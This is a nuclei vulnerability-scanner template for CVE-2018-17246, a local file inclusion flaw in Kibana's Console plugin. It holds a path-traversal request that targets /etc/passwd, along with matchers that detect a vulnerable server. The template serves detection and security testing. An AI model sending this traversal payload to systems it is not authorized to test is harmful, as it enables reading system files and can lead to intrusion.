nuclei-templates/cves/2018/CVE-2018-17246.yaml

44 lines
1.5 KiB
YAML

id: CVE-2018-17246
info:
name: Kibana - Local File Inclusion
author: princechaddha
severity: critical
description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
reference:
- https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md
- https://nvd.nist.gov/vuln/detail/CVE-2018-17246
- https://www.elastic.co/community/security
- https://discuss.elastic.co/t/elastic-stack-6-4-3-and-5-6-13-security-update/155594
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-17246
cwe-id: CWE-829
tags: cve,cve2018,lfi,kibana
requests:
- method: GET
path:
- "{{BaseURL}}/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: word
words:
- "\"message\":\"An internal server error occurred\""
part: body
- type: word
words:
- "kbn-name"
- "application/json"
- "kibana"
condition: and
part: header
- type: status
status:
- 500
# Enhanced by mp on 2022/05/13